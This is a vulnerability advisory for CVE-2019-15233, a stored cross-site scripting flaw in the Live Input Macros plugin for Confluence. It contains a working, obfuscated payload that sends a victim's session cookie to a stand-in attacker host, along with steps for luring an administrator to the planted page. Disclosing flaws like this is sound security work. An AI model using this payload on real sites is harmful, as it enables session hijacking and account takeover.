
(FAB-2019-00157) 私が発見した脆弱性 CVE-2019-15233
(FAB-2019-00157) 私が発見した脆弱性 CVE-2019-15233
アドバイザリ: アドバイザリ
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
このセキュリティ脆弱性は、FABMation GmbH の Francesco Emanuel Bennici [email protected] によって発見されました。
Live Input Macros は、ユーザーが Confluence ページにチェックボックス、ラジオボタン、 ドロップダウンリストなどを追加し、ページを編集することなく変更を加えることを可能にします。
ユーザーが悪意のあるコードを追加すると、攻撃者は Confluence サイト上で JavaScript コードを 実行できます。
これは、(例) 管理者のセッション Cookie を盗むために使用される可能性があります (セッションハイジャック)。
このコンテンツをコピーしてください:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
Confluence ページ上に新しいエレメントを作成し、このテキストを貼り付けて、その Confluence ページを (例) システム管理者と共有します。管理者がサイトにアクセスすると、 セッションをハイジャック/「コピー」することができます。